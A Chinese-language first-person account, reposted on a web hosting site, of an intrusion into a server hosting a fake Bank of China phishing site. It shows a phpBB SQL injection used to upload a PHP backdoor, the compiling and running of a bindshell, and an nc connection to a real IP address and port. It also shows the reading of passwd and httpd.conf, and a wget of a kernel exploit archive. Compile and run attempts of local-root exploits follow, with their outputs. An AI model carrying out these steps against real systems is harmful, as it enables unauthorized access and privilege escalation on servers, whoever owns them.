我那次入侵中国虚假银行的实录

来源：互联网 作者：west263.com 时间：2008-04-16

西部数码-全国虚拟主机10强！40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

我那次入侵中国虚假银行的实录

信息来源：internet

本来不打算把这个不成功的入侵写出来的，后来有几个朋友想看，既然能在内部交流，也没有什么见不得人的，索性发出来，初学者能够借鉴一点经验，高手能够在此基础上作更多尝试，我也想多学点东西。
27日晚看到天天网的一片报道：中国银行网站再次遭遇克隆假网站远在北美，
本站转载路径：http://www.coolersky.com/web/news/20050228014041.asp
本来要整理规划的，既然出了这个事情，好歹看看吧。废话不说，开始！
1、收集信息

服务器信息：
Apache/1.3.33
PHP/4.3.9
网站主文档：
_blank>http://www.banochi.net/english/index.shtml

查看虚假网站，基本没发现什么可用的东西，估计只有记录密码和ip的cgi程式。除了服务器入侵，还能够考虑旁注。
检索其他站点，分析了几个php站点的注入，没太多利用的地方。想起phpbb的洞洞，写段代码检索一下viewtopic.php文档，找到一个phpbb2.0.10入侵点

_blank>http://www.bits-clsu.org/forum/viewtopic.php?t=1

事后才想起能够用旁注工具直接来检索，反正都相同。
2、上传木马
利用phpbb的洞，漏洞介绍“phpBB远程任意SQL注入漏洞”，“phpbb<2.0.11程式的sql注入漏洞分析”上传php后门。
3、生成bindshell
我还在看文档的时候，Edward就已做了个bindshell出来，呵呵！基本方法：
上传bindshell.c

gcc -o /tmp/bind bindshell.c
/tmp/bind

nc上去看看，还是在shell下比较方便。

nc -vv 216.22.48.72 7758

4、采集系统信息
拿到webshell后就能够获得一些基本的信息包括passwd、httpd.conf等等，检索到虚假网站的绝对路径/home/banochin/public_html/，在webshell中查看文档创建的时期是服务器时间2004-12-15，在其cgi-bin目录下有如下文档

文档创建日期最后修改大小属性
[member] 2005-02-21 21:39:03 2005-02-21 21:39:03 <dir> 0700
errlog.dat 2005-02-28 00:32:22 2005-02-28 00:32:22 140.186 KB 0600
id.dat 2005-02-24 10:48:35 2005-02-24 10:48:35 1.727 KB 0600
index.htm 2004-12-15 03:19:51 2004-12-15 03:19:51 0.697 KB 0644
pwd.dat 2005-02-25 00:36:15 2005-02-25 00:36:15 0.170 KB 0600
pwdbak.dat 2004-12-15 03:24:17 2004-12-15 03:19:55 0.516 KB 0600
security.cgi 2004-12-15 03:24:03 2004-12-15 03:20:00 44.363 KB 0700
visemailer.cgi 2004-12-15 03:24:04 2004-12-15 03:20:02 3.554 KB 0700

能够看到最后记录的密码日期是2月25日，而浏览目录后发现还包括了很多其他语言的中国银行网站内容，但基本都是html文档，想必是从中国银行直接webdump下来的。
内核信息，因为我们对其目录没有写权限，接着要做的就是提权了。前后大概用了1小时左右，而剩下的提权工作却花了我1天多的时间，结果还是没搞定，郁闷！

uname -r
2.4.20-021stab022.11.777-enterprise

5、本地提升权限测试
增加环境变量
export PATH=/usr/bin:$PATH
否则会出现collect2: cannot find `ld'错误！
（1）Linux Kernel moxa串行驱动BSS溢出漏洞
grsecurity 2.1.0 release / 5 Linux kernel advisories
URL：
_bug&do=view&bug_id=7446&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
_blank>http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文档：
_and_patches.tgz" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz
测试：

wget _and_patches.tgz" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz
tar -zxvf exploits_and_patches.tgz
cd exploits_and_patches
make alloc=0x100000
------------------------------------------------------------------------
nasm -f elf -DALLOCATE=32482374 mlock-dos.S
make: nasm: Command not found
make: *** [ all ] Error 127
------------------------------------------------------------------------

结论：
缺少nasm，即使上传rpm也不能够执行安装！
（2）Linux Kernel uselib()特权提升漏洞
Linux kernel sys_uselib local root vulnerability
URL：
_bug&do=view&bug_id=7326&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
_blank>http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文档：
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
测试：

gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108
------------------------------------------------------------------------
elflbl_v108.c: In function `check_vma_flags':
elflbl_v108.c:545: warning: deprecated use of label at end of compound statement
------------------------------------------------------------------------
./elflbl_v108
------------------------------------------------------------------------
child 1 VMAs 0
[ ] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000
[ ] vmalloc area 0xc7c00000 - 0xcf707000
Wait... -Segmentation fault
-------------------------------------------------------------------------
gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109
./elflbl_v109
------------------------------------------------------------------------

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

[打印] [关闭]

相关文章

上一篇：入侵网站的各种漏洞的利用
下一篇：虚拟主机封杀webshell提权

热点关注

IDC资讯虚拟主机域名注册托管租用 vps主机智能建站
网站运营建站经验策划盈利搜索优化网站推广免费资源
网站联盟联盟新闻联盟介绍联盟点评网赚技巧
行业资讯业界动态搜索引擎网络游戏门户动态电子商务广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器安全防护
软件技巧其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识网络协议网络安全网络管理组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD

版权所有西部数码(www.west263.com)
CopyRight (c) 2002~2007 west263.com all right reserved.
公司地址：四川成都市万和路90号天象大厦4楼　邮编：610031
电话总机：028-86263408 86263960 86264018 86267838 86262244 86263408
售前咨询：总机转201 202 203 204 205 206 207 208
售后服务：总机转211 212 213 214 217 218 晚上0点以后拔分机225